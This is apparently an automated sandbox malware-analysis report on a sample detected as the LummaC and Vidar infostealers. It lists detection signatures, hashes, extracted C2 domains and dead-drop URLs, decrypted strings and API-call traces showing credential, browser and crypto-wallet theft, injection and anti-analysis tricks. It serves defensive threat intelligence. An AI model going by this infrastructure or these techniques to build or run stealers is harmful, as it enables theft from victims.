Windows Analysis Report
f1r6P3j3g7.exe

Overview

General Information

Sample name:	f1r6P3j3g7.exe renamed because original name is a hash value
Original sample name:	8351aa212d7278c381ebe13f2a435ad9.exe
Analysis ID:	1528299
MD5:	8351aa212d7278c381ebe13f2a435ad9
SHA1:	d529652f0ba92febad36c66a1b5be4398eddaef2
SHA256:	a86c7b65a6348d392d10d3982b6d0b896fdf646b218903a012d3c0dd73159f5b
Tags:	32exetrojan
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Country aware sample found (crashes after keyboard check)

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: f1r6P3j3g7.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://steamcommunity.com/profiles/76561199780418869	URL Reputation: Label: malware
Source: https://t.me/ae5ed	URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1310458
Source: C:\ProgramData\KEGIDHJKKJ.exe	Avira: detection malicious, Label: HEUR/AGEN.1310458

Found malware configuration

Source: 00000000.00000002.1815003832.000000000091D000.00000004.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "e694b6d50199ea44207a97e25dda5506"}
Source: 10.2.KEGIDHJKKJ.exe.d00000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["isoplethui.sbs", "frizzettei.sbs", "laddyirekyi.sbs", "invinjurhey.sbs", "bemuzzeki.sbs", "exilepolsiy.sbs", "exemplarou.sbs", "wickedneatr.sbs"], "Build id": "H8NgCl--"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\KEGIDHJKKJ.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: f1r6P3j3g7.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: wickedneatr.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: invinjurhey.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: laddyirekyi.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exilepolsiy.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: bemuzzeki.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: isoplethui.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: frizzettei.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: exemplarou.sbs
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: Workgroup: -
Source: 0000000A.00000002.2180254096.0000000000D2D000.00000004.00000001.01000000.0000000A.sdmp	String decryptor: H8NgCl--

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,	3_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	3_2_6CBB6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD0A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	3_2_6CD0A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD044C0 PK11_PubEncrypt,	3_2_6CD044C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD04440 PK11_PrivDecrypt,	3_2_6CD04440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCD4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	3_2_6CCD4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	3_2_6CD525B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CCEE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	3_2_6CCEE6E0

Uses 32bit PE files

Source: f1r6P3j3g7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53640 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:53641 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53645 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53658 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:53878 version: TLS 1.2

Source: f1r6P3j3g7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdb source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: freebl3.pdbp source: MSBuild.exe, 00000003.00000002.2188979014.000000001DC31000.00000004.00000020.00020000.00000000.sdmp, freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source:	Binary string: nss3.pdb@ source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: softokn3.pdb@ source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000003.00000002.2206196527.00000000359F7000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000003.00000002.2195422275.0000000029B1F000.00000004.00000020.00020000.00000000.sdmp, msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: MSBuild.exe, 00000003.00000002.2208972905.000000003B966000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2216736775.000000006CDDF000.00000002.00000001.01000000.00000008.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000003.00000002.2188334059.000000001D668000.00000002.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2182419932.00000000176F7000.00000004.00000020.00020000.00000000.sdmp, sql[1].dll.3.dr
Source:	Binary string: mozglue.pdb source: MSBuild.exe, 00000003.00000002.2215872054.000000006CC1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000003.00000002.2191931975.0000000023BAE000.00000004.00000020.00020000.00000000.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source:	Binary string: softokn3.pdb source: MSBuild.exe, 00000003.00000002.2203639910.000000002FA8B000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.3.dr, softokn3.dll.3.dr

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00909ABF FindFirstFileExW,	0_2_00909ABF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	3_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,	3_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	3_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	3_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	3_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	3_2_0040CD37
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D19ABF FindFirstFileExW,	10_2_00D19ABF

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,

3_2_00415142

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	0_2_0091E385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 4x nop then mov dword ptr [ebp-04h], eax	3_2_004014AD
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_00D5A0B9
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ebx, word ptr [ecx]	10_2_00D58051
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	10_2_00D482E8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh	10_2_00D743F8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D4A3BF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	10_2_00D6E318
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ecx, word ptr [edi+eax]	10_2_00D745E8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	10_2_00D68528
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5A687
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D5665F
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, ebx	10_2_00D4264D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D72601
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h	10_2_00D707F8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h	10_2_00D4C89C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	10_2_00D768A8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp dword ptr [0044FDB4h]	10_2_00D42849
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	10_2_00D4A86A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60813
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D3E9A5
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D3E914
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D6093D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	10_2_00D32928
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	10_2_00D54AD8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	10_2_00D3EAC6
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+000006B8h]	10_2_00D4AA47
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh	10_2_00D76A38
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh	10_2_00D76BB8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60B43
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	10_2_00D3CB78
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], A70A987Fh	10_2_00D6CB36
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov byte ptr [edi], al	10_2_00D60B22
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	10_2_00D5AC81
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then movzx ecx, word ptr [ebp+00h]	10_2_00D38D88
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D52D48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+40h]	10_2_00D3ED6B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], cx	10_2_00D54D38
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp eax	10_2_00D56EC4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D74E98
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [edx], 0000h	10_2_00D4CEB7
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D72EAE
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp]	10_2_00D6CE48
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	10_2_00D40F6F
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then jmp ecx	10_2_00D72F6C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+14h]	10_2_00D60F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h	10_2_00D70F18
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov dword ptr [esp+1Ch], 5E46585Eh	10_2_00D5CF30
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov ebp, eax	10_2_00D371D8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [esi], ax	10_2_00D4F138
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	10_2_00D73290
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+30h]	10_2_00D5F2B8
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], C274D4CAh	10_2_00D73390
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esp+0Ch]	10_2_00D593AF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	10_2_00D4340E
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 4x nop then mov word ptr [eax], dx	10_2_00D4F540
